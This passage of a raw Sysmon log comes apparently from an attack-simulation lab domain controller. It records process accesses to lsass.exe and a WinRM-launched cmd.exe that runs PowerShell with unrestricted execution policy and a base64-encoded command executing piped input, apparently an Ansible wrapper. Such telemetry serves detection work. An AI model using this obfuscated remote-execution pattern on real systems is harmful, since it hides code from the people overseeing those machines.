FUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003287Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003286Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857E-5FCF-9E00-000000009101}4924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003285Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003284Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003283Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003282Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003281Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003280Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003279Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003278Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003277Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003276Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-857E-5FCF-9E00-000000009101}4924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003275Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-857E-5FCF-9C00-000000009101}49365004C:\Windows\system32\WinrsHost.exe{10ACEC4A-857E-5FCF-9E00-000000009101}4924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003274Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-857E-5FCF-9E00-000000009101}4924C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-857E-5FCF-9C00-000000009101}4936C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003273Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.164{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003272Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.164{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003271Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.164{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003270Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.164{10ACEC4A-8541-5FCF-1500-000000009101}13641680C:\Windows\system32\svchost.exe{10ACEC4A-857E-5FCF-9C00-000000009101}4936C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003269Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 